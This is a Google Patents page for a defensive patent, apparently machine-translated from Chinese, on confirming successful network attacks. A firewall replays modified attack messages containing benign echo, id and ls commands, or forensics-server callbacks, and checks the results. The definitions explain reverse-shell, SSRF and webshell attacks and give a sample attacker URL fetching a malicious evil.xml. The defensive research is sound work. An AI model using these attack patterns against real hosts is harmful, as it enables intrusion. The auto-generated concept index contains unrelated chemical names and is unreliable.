WO2023116045A1 - 攻击成功识别方法及防护系统 - Google Patents
攻击成功识别方法及防护系统 Download PDFInfo
- Publication number
- WO2023116045A1 WO2023116045A1 PCT/CN2022/116571 CN2022116571W WO2023116045A1 WO 2023116045 A1 WO2023116045 A1 WO 2023116045A1 CN 2022116571 W CN2022116571 W CN 2022116571W WO 2023116045 A1 WO2023116045 A1 WO 2023116045A1
- Authority
- WO
- WIPO (PCT)
- Prior art keywords
- attack
- message
- command
- attacked host
- protection system
- Prior art date
Links
- 238000000034 method Methods 0.000 title claims abstract description 141
- 238000012360 testing method Methods 0.000 claims abstract description 132
- 230000004044 response Effects 0.000 claims abstract description 112
- 238000001514 detection method Methods 0.000 claims description 53
- 238000012545 processing Methods 0.000 claims description 29
- 230000014509 gene expression Effects 0.000 claims description 24
- 238000004590 computer program Methods 0.000 claims description 20
- 238000012546 transfer Methods 0.000 claims description 15
- 230000003993 interaction Effects 0.000 abstract description 17
- 239000000523 sample Substances 0.000 description 21
- 230000006399 behavior Effects 0.000 description 18
- 239000000243 solution Substances 0.000 description 12
- 230000002452 interceptive effect Effects 0.000 description 10
- 230000008569 process Effects 0.000 description 10
- 230000006870 function Effects 0.000 description 9
- 238000010586 diagram Methods 0.000 description 8
- 239000000284 extract Substances 0.000 description 7
- RTZKZFJDLAIYFH-UHFFFAOYSA-N Diethyl ether Chemical compound CCOCC RTZKZFJDLAIYFH-UHFFFAOYSA-N 0.000 description 6
- 230000005540 biological transmission Effects 0.000 description 6
- ZXQYGBMAQZUVMI-GCMPRSNUSA-N gamma-cyhalothrin Chemical compound CC1(C)[C@@H](\C=C(/Cl)C(F)(F)F)[C@H]1C(=O)O[C@H](C#N)C1=CC=CC(OC=2C=CC=CC=2)=C1 ZXQYGBMAQZUVMI-GCMPRSNUSA-N 0.000 description 6
- 230000007123 defense Effects 0.000 description 5
- 238000007726 management method Methods 0.000 description 5
- 230000003287 optical effect Effects 0.000 description 5
- 238000002955 isolation Methods 0.000 description 4
- 230000004048 modification Effects 0.000 description 4
- 238000012986 modification Methods 0.000 description 4
- 230000002441 reversible effect Effects 0.000 description 4
- 238000004891 communication Methods 0.000 description 3
- 238000012544 monitoring process Methods 0.000 description 3
- 230000009471 action Effects 0.000 description 2
- 230000002155 anti-virotic effect Effects 0.000 description 2
- 238000013528 artificial neural network Methods 0.000 description 2
- 230000002457 bidirectional effect Effects 0.000 description 2
- 238000004422 calculation algorithm Methods 0.000 description 2
- 238000010219 correlation analysis Methods 0.000 description 2
- 238000005516 engineering process Methods 0.000 description 2
- 238000002513 implantation Methods 0.000 description 2
- 238000002347 injection Methods 0.000 description 2
- 239000007924 injection Substances 0.000 description 2
- 230000002265 prevention Effects 0.000 description 2
- 238000013515 script Methods 0.000 description 2
- 230000003068 static effect Effects 0.000 description 2
- 241000699670 Mus sp. Species 0.000 description 1
- 241000700605 Viruses Species 0.000 description 1
- 230000032683 aging Effects 0.000 description 1
- 230000009286 beneficial effect Effects 0.000 description 1
- 230000008901 benefit Effects 0.000 description 1
- 238000004364 calculation method Methods 0.000 description 1
- 230000001413 cellular effect Effects 0.000 description 1
- 238000006243 chemical reaction Methods 0.000 description 1
- 235000014510 cooky Nutrition 0.000 description 1
- 238000013500 data storage Methods 0.000 description 1
- 230000003203 everyday effect Effects 0.000 description 1
- 238000010801 machine learning Methods 0.000 description 1
- 238000012423 maintenance Methods 0.000 description 1
- 239000013307 optical fiber Substances 0.000 description 1
- 230000037361 pathway Effects 0.000 description 1
- 230000000750 progressive effect Effects 0.000 description 1
- 230000008439 repair process Effects 0.000 description 1
- 238000011160 research Methods 0.000 description 1
- 239000010979 ruby Substances 0.000 description 1
- 229910001750 ruby Inorganic materials 0.000 description 1
- 239000004065 semiconductor Substances 0.000 description 1
- 230000001953 sensory effect Effects 0.000 description 1
- 239000007787 solid Substances 0.000 description 1
- 230000001960 triggered effect Effects 0.000 description 1
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1416—Event detection, e.g. attack signature detection
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1425—Traffic logging, e.g. anomaly detection
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L67/00—Network arrangements or protocols for supporting network services or applications
- H04L67/01—Protocols
- H04L67/02—Protocols based on web technology, e.g. hypertext transfer protocol [HTTP]
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L9/00—Cryptographic mechanisms or cryptographic arrangements for secret or secure communications; Network security protocols
- H04L9/40—Network security protocols
Definitions
- the present application relates to the field of network technology, in particular to a method for identifying a successful attack and a protection system.
- the protection device detects attacks on packets in a data stream transmitted between communication peers based on the signature database. If the protection device detects an attack event, the protection device extracts the attack command from the payload content (payload) of the message generating the attack event, and determines the expected result after the attack command is executed by the server. Afterwards, the protection device further determines whether the response message from the server in the above data stream actually contains the above expected result. If the response message from the server in the above data stream contains the above expected result, it is determined that the attack is successful. If the response message from the server in the above data stream does not contain the above expected result, it is determined that the attack fails.
- the above method is only applicable to the situation where the result of the attack command can be expected, but cannot be applied when the result of the attack command is difficult to predict. It can be seen that the applicable scenarios of this method are limited, and it cannot effectively identify successfully executed attack events from a large number of attack alerts.
- the present application provides a method for successfully identifying an attack and a protection system, which can more effectively identify successfully executed attack events.
- the technical scheme is as follows.
- a method for identifying a successful attack comprising: performing attack detection on a data flow; if a first attack event is detected in the data flow, triggering the first attack based on the data flow The attack message of the event generates a test message; sends the test message to the attacked host, and the attacked host is the target party of the attack message;
- the specific event associated with the test packet is detected, it is determined that the first attack event is an attack success event.
- the above provides a method for successfully identifying attacks based on active interaction.
- the protection system actively sends a test message to the attacked host after detecting an attack event, and determines whether the detected attack event is a successful attack according to whether a specific event related to the test message occurs. event. Because this method does not need to rely on the attack command in the attack message, it does not need to rely on the response message of the attack message to detect whether the attack is successful, so it can be applied to the situation where the attack command is not echoed or the result of the attack command is unpredictable , the applicable scenarios are more abundant, which helps to more effectively identify successfully executed attack events from massive attack alarms.
- the generating a test message based on the attack message that triggers the first attack event in the data stream includes: modifying the attack message, and using the modified attack message as the Test message.
- the modifying the attack message includes: replacing the attack command included in the attack message with a setting command.
- the setting command is used to trigger the command executing party to respond to the execution result of the setting command.
- the attack command is replaced by a command with a fixed echo, after active interaction with the attacked host, it can accurately determine whether the attack is successful based on the echo matching method, which solves the problem of identifying the success of a single-stream attack based on the response content.
- the scheme if there is no echo, it is difficult to judge, if the echo is unpredictable, it is difficult to judge, and it is easy for attackers to bypass the problem through encoding.
- the specific event includes that the execution result sent by the attacked host is the same as the expected result of the setting command
- the detection of the specific event associated with the test message includes: receiving the attacked A response message sent by the host for the test message; parsing the response message to obtain the execution result of the set command carried by the attacked host in the response message; determining the response The execution result carried in the message is the same as the expected result corresponding to the setting command.
- the setting command is "echo predetermined character string"
- the expected result of the setting command is "predetermined character string”.
- the setting command is "id"
- the specific event includes that the execution result sent by the attacked host satisfies the regular expression corresponding to the setting command
- the detection of the specific event associated with the test message includes: receiving the A response message sent by the attacking host for the test message; parsing from the response message to obtain the execution result of the set command carried by the attacked host in the response message; determining the The execution result carried in the response message satisfies the regular expression corresponding to the setting command.
- the setting command is "dir"
- the regular expression corresponding to the setting command is "' ⁇ d ⁇ 4 ⁇ / ⁇ d ⁇ 2 ⁇ / ⁇ d ⁇ 2 ⁇ s ⁇ 1,10 ⁇ d ⁇ 2 ⁇ : ⁇ d ⁇ 2 ⁇ s ⁇ 1,10 ⁇ DIR>'".
- the setting command is “ls–l”, and the regular expression corresponding to the setting command is “[d ⁇ -][rwx ⁇ -] ⁇ 9 ⁇ ”.
- the modifying the attack message includes: replacing the address information included in the attack message with address information corresponding to the forensics server.
- the address information included in the attack message or the address information corresponding to the evidence collection server includes an Internet protocol (internet protocol, IP) address, port number, domain name or uniform resource locator (uniform resource locator, URL) at least one.
- Internet protocol internet protocol, IP
- port number port number
- domain name domain name
- uniform resource locator uniform resource locator
- the protection system can perceive the behavior of the attacked host more timely, and can quickly determine the success of the attack, avoiding the multi-stream association method that relies on the session between the attacked host and the attacker to complete the
- the problem of long time window caused by the detection of session traffic saves time delay and improves performance efficiency.
- the specific event includes that the attacked host accesses the forensics server after the time point when the test message is sent
- the detection of the specific event associated with the test message includes: obtaining the The access record of the forensics server after the sending time point of the test message; if there is a record corresponding to the attacked host in the accessed record, then determine that the test message is sent after the time point The attacked host accesses the forensic server.
- the attack message is used to instruct the attacked host to create or modify a specified file
- the attack message includes the identifier of the specified file
- generating a test message includes: generating the test message based on the identifier of the specified file included in the attack message, where the test message is used to request access to the specified file.
- the protection system since the protection system actively accesses the files implanted on the attacked host instead of the attacker, it does not need to depend on the time when the attacker accesses the file, thus solving the problem that the multi-stream association method depends on the behavior of the attacker.
- the specific event includes a second attack event associated with the specified file in the data flow related to the attacked host after the test packet is sent.
- the specific event includes that the specified file is successfully accessed
- the detection of a specific event associated with the test message includes: data flow related to the attacked host after the test message Obtain the response message for the test message sent by the attacked host; if the Hypertext Transfer Protocol (Hypertext Transfer Protocol, HTTP) response code in the response message is a successful response code, determine the The specified file is accessed successfully.
- HTTP Hypertext Transfer Protocol
- the specific event includes that the specified file is successfully accessed
- the detection of a specific event associated with the test message includes: data flow related to the attacked host after the test message Obtain the response message sent by the attacked host for the test message; if there is a set character string in the message body of the response message, determine that the first attack event is an attack success event, and the The set character string indicates that the specified file was successfully accessed.
- test message is an HTTP request message.
- test message is a File Transfer Protocol (File Transfer Protocol, FTP) request message, a Domain Name System (Domain Name System, DNS) request message, a Remote Method Invocation (Remote Method Invocation, RMI) request message , Lightweight Directory Access Protocol (Lightweight Directory Access Protocol, LDAP) request message, Network File System (Network File System, NFS) request message, Hyper Text Transfer Protocol over Secure Socket Layer (HTTPS) request message text, transmission control protocol (transmission control protocol, TCP) request message or user datagram protocol (User Datagram Protocol, UDP) message.
- File Transfer Protocol FTP
- DNS Domain Name System
- RMI Remote Method Invocation
- LDAP Lightweight Directory Access Protocol
- NFS Network File System
- HTTPS Hyper Text Transfer Protocol over Secure Socket Layer
- TCP transmission control protocol
- UDP User Datagram Protocol
- the second aspect provides an attack success identification device, which has the function of implementing the method described in the above first aspect or any optional mode of the above first aspect.
- the functions described above may be implemented by hardware, or may be implemented by executing corresponding software on the hardware.
- the hardware or software includes one or more units corresponding to the above functions.
- a protection system in a third aspect, includes: a processor, the processor is coupled to a memory, at least one computer program instruction is stored in the memory, and the at least one computer program instruction is executed by the processor Load and execute, so that the protection system executes the method in the above first aspect or any optional manner of the first aspect.
- the protection system further includes a network interface, and the network interface is used for receiving the data flow and sending the test message.
- the protection system is a single physical computer.
- the protection system includes multiple physical computers, and the memory, network interface and at least one processor in the protection system are distributed on different physical computers.
- the fencing system is a cluster computer.
- a computer-readable storage medium is provided. At least one instruction is stored in the storage medium. When the instruction is run on a computer, the computer executes the above-mentioned first aspect or any one of the optional methods of the first aspect. provided method.
- a computer program product includes one or more computer program instructions, and when the computer program instructions are loaded and executed by a computer, the computer executes the above-mentioned first aspect or the first aspect. In one aspect, the method provided by any optional mode.
- a chip including a memory and a processor, the memory is used to store computer instructions, and the processor is used to call and execute the computer instructions from the memory, so as to perform the above-mentioned first aspect and any possible aspects of the first aspect thereof. method in the implementation.
- FIG. 1 is a schematic diagram of a typical application scenario provided by an embodiment of the present application
- FIG. 2 is a flow chart of a method for identifying a successful attack provided by an embodiment of the present application
- Fig. 3 is a framework diagram of the workflow of a protection system provided by the embodiment of the present application.
- Fig. 4 is a detailed flowchart of the work of a protection system provided by the embodiment of the present application.
- FIG. 5 is a flow chart of a method for determining the success of an attack based on fixed echo matching after active interaction provided by this embodiment
- FIG. 6 is a flow chart of a method for judging the success of an attack based on the access behavior to the forensics server after active interaction provided by this embodiment
- FIG. 7 is a flow chart of a method for actively accessing created or modified files to determine the success of an attack provided by this embodiment
- FIG. 8 is a schematic structural diagram of an attack success identification device 800 provided in an embodiment of the present application.
- FIG. 9 is a schematic structural diagram of a protection system 900 provided by an embodiment of the present application.
- a data flow refers to a series of packets exchanged by two communicating parties in a session.
- the data stream includes the request message sent by the client to the server and the response message sent by the server in response to the request message.
- HTTP Hypertext Transfer Protocol
- the attacker After the attacker establishes a connection with the attacked host, the attacker sends a series of HTTP requests to the attacked host.
- the attacking host sends a series of HTTP responses to the attacker in response to these HTTP requests.
- the data flow used by the protection system for attack detection includes the HTTP requests sent by the attacker and the HTTP responses sent by the attacked host.
- Attack payload generally refers to any data used to launch a network attack.
- the carrying location of the attack payload may be the message body, or the message header or URL.
- the attack payload includes but is not limited to at least one of attack commands, uniform resource locators (Uniform Resource Locators, URLs) of malicious files, address information of the control terminal, URLs of specified resources in the local area network, or address information of specified hosts in the local area network.
- uniform resource locators Uniform Resource Locators, URLs
- An attack packet refers to a packet carrying an attack payload.
- the protocol types based on the attack message include but are not limited to Hypertext Transfer Protocol (Hypertext Transfer Protocol, HTTP), File Transfer Protocol (File Transfer Protocol, FTP), Domain Name System (Domain Name System, DNS), Remote Method Call (Remote Method Invocation, RMI), Lightweight Directory Access Protocol (Lightweight Directory Access Protocol, LDAP), Hypertext Transfer Security Protocol (Hyper Text Transfer Protocol over Secure Socket Layer, HTTPS), Transmission Control Protocol (transmission control protocol, TCP), user data Protocol (User Datagram Protocol, UDP), Network File System (Network File System, NFS), etc.
- the attack packet is, for example, an HTTP request packet.
- the body of the HTTP request message contains an attack command, or the request line of the HTTP request message includes the URL of a malicious file, or the IP header encapsulated in the outer layer of the HTTP message header includes the Internet Protocol (IP) of the control terminal. )address.
- IP Internet Protocol
- An attack command generally refers to any malicious command.
- the attack command is used to instruct the host to run malicious files (such as viruses or Trojan horses), or to instruct the host to output sensitive or confidential data in the intranet (such as user information and device parameters in the intranet) to specified addresses on the Internet , or it is used to instruct the host to create a malicious file locally, or to instruct the host to write malicious code into a specified file that already exists locally.
- Echo refers to the execution result of the command that the host responds after executing the command. For example, enter the echo command to the host: echo ognl_attack_test. After the host executes this echo command, it outputs ognl_attack_test. In this example, ognl_attack_test is the echo of the echo command.
- a webshell is a shell-like script program that can remotely access a web server.
- Webshells usually exist in the form of files.
- the shell is commonly known as the shell (used to distinguish it from the core), and refers to the software (also known as the command interpreter, command interpreter) that "provides the user with an operation interface".
- the webshell interacts with the web server based on the web browser.
- the webshell can be programmed in any programming language supported on the server. Due to the widespread use of PHP in web applications, webshells are usually written in the PHP programming language, Active Server Pages (ASP), NET, Python, Perl, Ruby, and Unix shell scripts can also be used to write webshells.
- ASP Active Server Pages
- Python Python
- Perl Ruby
- Unix shell scripts can also be used to write webshells.
- webshell The role of webshell is mainly divided into two types. On the one hand, webmasters often use webshells for website management, server management, and more. On the other hand, webshells are often used by attackers to achieve the purpose of controlling website servers. Such malicious webshells are also called backdoor files, backdoor programs, and web script Trojan horses.
- the basic principle of exploiting webshell attacks is that attackers use network monitoring tools to find vulnerabilities that can be passed through webshells, which usually appear in applications running on web servers. After that, the attacker can use the webshell to issue shell commands, perform privilege escalation on the web server, and upload, delete, download, and execute files on the web server, etc.
- a basic process of reverse shell attack is that in the first step, the attacker sends an attack message to the attacked host, and the attack message includes the IP address of the control terminal and the port number of the designated TCP or UDP port on the control terminal.
- the attack message instructs the attacked host to connect to the specified port on the control terminal.
- the attacked host will actively send a connection request after receiving the attack message.
- the destination IP address in the connection request is the IP address of the control terminal carried in the attack message.
- the destination port number in the connection request is the port number of the control terminal carried in the attack message. In this way, the attacked host establishes a connection with the designated port on the control terminal.
- the control terminal uses the connection with the attacked host to send malicious instructions to the attacked host.
- the attacked host executes the command and returns the execution result of the command to the control terminal through the connection.
- the control terminal refers to a host or a cluster of multiple hosts controlled by the attacker.
- the basic feature of a successful rebound shell attack is that in the second step, the attacked host actively sends a request message, and the request message contains the specified address information, which comes from the first step
- the address information may be an IP address and port number, or a domain name and URL.
- the “outside” in outgoing requests refers to the Internet.
- the basic process of an outgoing request attack is as follows.
- the attacker sends an attack packet to the attacked host.
- the attack payload in the attack packet includes the address of a specified host on the Internet or the URL of a specified file on the Internet.
- the specified host usually It is the host used by the attacker or the control host, and the specified file often contains malicious code.
- the attack message contains the URL http://attacker_server/evil.xml, which usually corresponds to a file containing malicious code. If the attack is successful, the attacked host sends an external address http://attacker_server/evil. xml initiates the request.
- the basic process of an SSRF attack is that, in the first step, the attacker sends an attack packet to the attacked host.
- the attack packet is usually a request forged by the attacker to obtain resources on the attacked host.
- the request typically contains a URL similar to a nested form.
- the host field of the URL includes the domain name or IP address of the attacked host.
- the parameter field of the URL in turn contains the URL of the resource on the specified host in the local area network.
- the attack if the attack is successful, the attacked host will actively send a request for resources on the specified host in the LAN after receiving the attack message.
- the echo command is an output command in linux.
- the echo command is used to instruct the command executor to output a predetermined character string.
- the basic format of the echo command is echo[predetermined character string], that is, a character string "echo", followed by a character string specifying the response of the executing party.
- the format of the echo command is replaced with echo[option][predetermined character string].
- an echo command is echo ognl_attack_test, and the execution result of this echo command is ognl_attack_test.
- the print command is another output command in linux.
- the function of the print command is basically the same as that of the echo command.
- predetermined character string that is, a character string "print”
- a print command is print test, and the execution result of this print command is test.
- printf commands besides the print command, there are printf commands, fprintf commands, sprintf commands, etc., which are basically equivalent to the echo command, and will not be listed here.
- execution results of these commands are basically the strings carried by the commands themselves, so the execution results of these commands can be expected in advance.
- the id command is used to query user information, such as user ID (user ID, UID), user group (group) to which the user belongs, group ID (group ID, GID), etc.
- user ID user ID
- group group ID
- GID group ID
- the id command will trigger the command executor to respond to the user's information.
- the basic format of the id command is id[parameter][username]. If there is no parameter and no user name after id, the user name, user group, UID, and GID of the current operating user are queried by default.
- the user name is root
- the UID is 0,
- the user group to which the user belongs is root
- the GID of the user group is 0.
- execution results of the id command described above are only exemplary, and the root in the above execution results can be replaced with other user-defined user names, such as admin and user.
- the 0s in the above execution results can be replaced with other UIDs. This embodiment does not limit the specific form and content of the execution result of the id command.
- the ifconfig command is used to configure or view network interfaces.
- the ifconfig command can trigger the command executor to respond to the status or parameters of the network interface.
- the execution results of the ifconfig command include flags, RUNNING, mtu, inet, ether, and netmask.
- RUNNING indicates that the network interface is running
- mtu indicates the maximum transmission unit
- inet indicates the network address of the network port
- ethe indicates Ethernet (Ethernet)
- netmask indicates the subnet mask.
- Regular expressions are used to describe and match a series of strings that match a certain syntax rule.
- the form of the regular expression is a pattern between slashes or between any delimiters following %r.
- the dir command is used to view information about files.
- the dir command can trigger the command executor to respond to specific file information such as which files exist in the specified directory or the size and creation time of the files.
- the execution result of the dir command satisfies the regular expression ' ⁇ d ⁇ 4 ⁇ / ⁇ d ⁇ 2 ⁇ / ⁇ d ⁇ 2 ⁇ s ⁇ 1,10 ⁇ d ⁇ 2 ⁇ : ⁇ d ⁇ 2 ⁇ s ⁇ 1, 10 ⁇ DIR>'.
- / ⁇ d/ is used to match a number, which is equivalent to /[0-9]/, such as d ⁇ 4 ⁇ means to match 4 numbers.
- / ⁇ s/ is used to match a blank character, which is equivalent to /[ ⁇ t ⁇ r ⁇ n ⁇ f]/.
- ⁇ DIR> is a fixed character string included in the execution result of the dir command.
- the ls–l command is used to view the attributes of a file or directory.
- the ls–l command can trigger the command executor to respond to information such as the node, type, permission mode, number of links, user and user group to which the file or directory belongs, and the time of the latest access or modification.
- the execution result of the ls–l command satisfies the regular expression [d ⁇ -][rwx ⁇ -] ⁇ 9 ⁇ .
- d means directory
- rwx means three attributes in Linux files
- r means readable
- w means writable
- x means executable.
- HTTP response code also known as the HTTP status code (HTTP status code)
- HTTP status code is a 3-digit code used to indicate the HTTP response status of the web server.
- HTTP response codes are divided into five categories, and the first digit of the response code represents one of the five statuses of the response.
- the five types of HTTP response codes are 1xx information (information), 2xx success (successful), 3xx redirection (redirection), 4xx client error (client error) and 5xx server error (server error).
- 2xx success response codes indicate that the request has been successfully received, understood, and accepted by the server.
- the 2xx success response codes include 200, 201, 202, 203, 204, 205, 206, 207, 208, and 226.
- the meanings of typical success response codes are as follows.
- 200 OK means that the request has been successful, and the response header or data body expected by the request will be returned with this response.
- the actual response will depend on the request method used.
- the response In a GET request, the response will contain the entity corresponding to the requested resource.
- the response In a POST request, the response will contain an entity describing or the result of the operation.
- 201 created means that the request has been implemented, and a new resource has been created according to the request, and the URI of the resource has been returned with the Location header information.
- the server 202 accepted means that the server has accepted the request but has not yet processed it. Ultimately the request may or may not be executed, and processing may be prohibited while it occurs.
- Non-Authoritative Information indicates that the server is a conversion proxy server, such as a network accelerator.
- No Content means that the server successfully processed the request and did not return any content.
- Reset Content indicates that the server successfully processed the request, but did not return any content. Unlike the 204 response, this response requires the requester to reset the document view.
- Partial Content indicates that the server has successfully processed part of the GET request.
- protection system Network security protection system
- a defense system refers to a computer system used to protect a network area from network attacks and network intrusions from another network area.
- the protection system is optionally a computer cluster, or a computer.
- the specific product form of the protection system includes but not limited to firewall (firewall), security gateway, intrusion detection system (intrusion detection system, IDS) type equipment, intrusion prevention system (intrusion prevention system, IPS) type equipment, unified threat management (unified threat management) Management, UTM) equipment, anti-virus (anti-virus, AV) equipment, anti-distributed denial-of-service attack (distributed denial-of-service attack, DDoS) (anti-DDoS) equipment, next generation firewall (Next generation firewall, NGFW )etc.
- firewall firewall
- IDS intrusion detection system
- IPS intrusion prevention system
- unified threat management unified threat management
- UTM anti-virus
- anti-virus anti-virus
- AV anti-distributed denial-of-service attack
- DDoS anti
- firewalls are used as an example to describe, a specific device, a firewall, is usually used to isolate two networks. Of course, this kind of isolation is clever. What isolates is the spread of "fire", while ensuring that "people” pass through the wall. The “fire” here refers to various attacks in the network, and the “person” refers to service packets. Because of its isolation and defensive properties, firewalls are flexibly applied to locations such as network boundaries and subnet isolation, such as enterprise network egress, large-scale network internal subnet isolation, and data center boundaries.
- Firewalls are different from routers and switches. Routers are used to connect different networks, ensure interconnection and interoperability through routing protocols, and ensure that packets are forwarded to the destination; switches are usually used to form LANs, as an important hub for LAN communications, and quickly forward packets through layer-2/layer-3 switching ; while the firewall is mainly deployed at the network border to control the access behavior of entering and exiting the network. That is to say, the main function of routers and switches is forwarding, while the main function of firewalls is security protection.
- the network deployment scenario of the embodiment of the present application is illustrated below with an example.
- FIG. 1 is a schematic diagram of a network deployment scenario provided by an embodiment of the present application. As shown in FIG. 1 , a protection system 10 is deployed between the enterprise network and the Internet.
- the protection system 10 is used to detect attacks on the network traffic between the enterprise network and the Internet, and use the technical solution of this application to judge the success of the attack.
- the protection system 10 includes a firewall 101 , a probe 102 or a security analyzer 103 .
- the firewall 101 is deployed at the egress of the enterprise network through a direct connection, and can obtain bidirectional traffic at the deployment location.
- the firewall 101 detects an attack event, it further uses the technical solution of the present application to determine whether the attack is successful.
- the security analyzer 103 can obtain the bidirectional traffic of the deployment location through mirroring through the bypass deployment.
- Security analyzer 103 uses probe 102 to collect network traffic data at the egress of the enterprise network.
- the probe 102 performs attack detection and attack success determination, or the probe 102 sends the collected data to the security analyzer 103, and the security analyzer 103 performs attack detection and attack success determination.
- Fig. 2 is a flow chart of a method for identifying a successful attack provided by an embodiment of the present application.
- the method shown in FIG. 2 includes the following steps S201 to S204.
- the network deployment scenario on which the method shown in FIG. 2 is based may optionally be as shown in FIG. 1 above.
- the protection system in the method shown in FIG. 2 includes the firewall 101 in FIG. 1 .
- the security analyzer 103 deployed in the bypass executes the technical solution of the present application to judge whether the attack is successful
- the protection system in the method shown in FIG. 2 includes the security analyzer 103 in FIG. 1 , and optionally also includes a firewall 101 and probe 102 .
- all the steps in the method shown in Fig. 2 are executed by the same device in the protection system.
- the following S201 to S204 are all executed by the security analyzer 103 or are all executed by the firewall 101 .
- different steps in the method shown in FIG. 2 are executed by different devices in the protection system.
- the firewall 101 executes S201, and if an attack event is detected, the firewall 101 sends the attack packet to the security analyzer 103, and the security analyzer 103 executes S202 to S204 based on the attack packet.
- a typical application scenario of the method shown in FIG. 2 is to detect whether an attack event initiated by the Internet on a LAN is a successful attack event, so as to defend against attacks or repair security vulnerabilities of the LAN, thereby protecting the network security of the LAN.
- Specific scenarios where the method shown in Figure 2 is applicable include but are not limited to reverse shells, outgoing request attacks, webshell implantation, SSRF attacks, and the like.
- Figure 2 Some alternative embodiments of Figure 2 involve multiple attack events. In order to distinguish different attack events, “first attack event” and “second attack event” are used to distinguish and describe different attack events.
- the protection system detects attacks on the data stream.
- the data flow targeted by the protection system for detection includes packets with the host in the local area network as the destination, and optionally also includes messages sent by the host in the local area network.
- the data flow used for detection is the data flow transmitted between the enterprise network and the Internet in FIG. 1 .
- the data flow detected by the protection system is an HTTP message flow
- the data flow detected by the protection system includes HTTP request packets with hosts in the LAN as the destination, and optionally HTTP packets sent by hosts in the LAN. Response message.
- HTTP is just an example.
- the types of packets detected by the protection system are replaced by HTTP packets, FTP packets, DNS packets, RMI packets, LDAP packets, NFS packets, HTTPS packets, For TCP messages, UDP messages, etc., this embodiment does not limit the protocol type of the messages that the protection system detects.
- the protection system If the first attack event is detected in the data stream, the protection system generates a test message based on the attack message in the data stream that triggers the first attack event.
- the first attack event includes but not limited to various WEB intrusion events, such as deserialization, command injection, and other events.
- An attack message is a message from an attacker or a control terminal, with the attacked host as a destination.
- the source IP address in the attack packet is the IP address of the attacker or the control end.
- the destination IP address of the attack packet is the IP address of the attacked host.
- the destination port number of the attack packet is the port number of the port on the attacked host.
- the attacked host is a terminal or server in an enterprise network.
- the test packet is used to test whether the first attack event is an attack success event.
- the test message is a message from the protection system with the attacked host as the destination.
- the source IP address in the test packet is the IP address of the protection system.
- the destination IP address in the test packet is the IP address of the attacked host.
- the destination port number in the test packet is the port number of the port on the attacked host.
- the source IP address field in the test packet is filled by the protection system according to the local IP address.
- the destination IP address in the test packet is consistent with the destination IP address in the attack packet, and the destination port number in the test packet is consistent with the destination port number in the attack packet.
- the protocol type on which the test message is based includes many implementations.
- the test packet is an HTTP request packet.
- the test message is replaced with a request message in other protocols, such as FTP request message, DNS request message, RMI request message, LDAP request message, NFS request message, HTTPS request message, TCP request message message, UDP request message, etc., this embodiment does not limit the type of protocol adopted by the test message.
- the protocol type based on the test packet is the same as the protocol type based on the attack packet triggering the first attack event.
- the above attack packet is an HTTP request packet
- the test packet is also an HTTP request packet.
- the protection system sends a test packet to the attacked host.
- the protection system determines that the first attack event is a successful attack event.
- This embodiment provides a method for identifying a successful attack based on active interaction.
- the protection system actively sends a test message to the attacked host after detecting an attack event, and determines whether the detected attack event is a successful attack according to whether a specific event related to the test message occurs. event. Since this method does not need to rely on the attack command in the attack message, it does not need to depend on whether the result of the attack command can be expected, so it can be applied to situations where the attack command is not echoed or the result of the attack command is difficult to predict, and the applicable scenarios are more abundant , which helps to more effectively identify successfully executed attack events from massive attack alerts.
- the protection system since the protection system actively interacts with the attacked host, when the attacked host responds to the test message sent by the protection system, it will naturally send the response message to the protection system instead of the attacker. Or, in scenarios such as outgoing request attacks, SSRF attacks, and reverse shells, the attacked host will naturally access the device (such as a forensic server) specified by the protection system in the test message instead of the device specified by the attacker. Therefore, the protection system can perceive the behavior of the attacked host more timely, and can quickly determine the success of the attack, avoiding the multi-stream association method that relies on the session between the attacked host and the attacker to complete the The problem of long time window caused by the detection of session traffic saves time delay and improves performance efficiency.
- Implementation method A The protection system uses an attack detection model to detect attacks on data streams.
- An attack detection model refers to a model that is trained using machine learning based on malicious traffic samples and/or live network traffic.
- the attack detection model is used to detect whether there are attack events in the data stream.
- the attack detection model can optionally be trained on the cloud and delivered to the protection system by the cloud, or the attack detection model can be trained locally on the protection system.
- an attack detection model is stored on the protection system.
- the protection system analyzes and obtains key data from the data flow, and the protection system inputs the key data of the data flow into the attack detection model, and determines whether there is an attack event in the data flow according to the output result of the attack detection model.
- the key data of the above data flow includes but not limited to some keywords in the application layer load of the data flow, the information entropy of some keywords in the data flow, the cookie carried in the flow, the timestamp carried in the data flow, and the referer in the data flow parameters and so on.
- Implementation mode B The protection system uses the signature database to detect attacks on the data stream.
- the feature library is also called the signature library.
- the signature library includes various attack signatures, which are extracted by network security solution providers from a large number of known malicious traffic or malicious files.
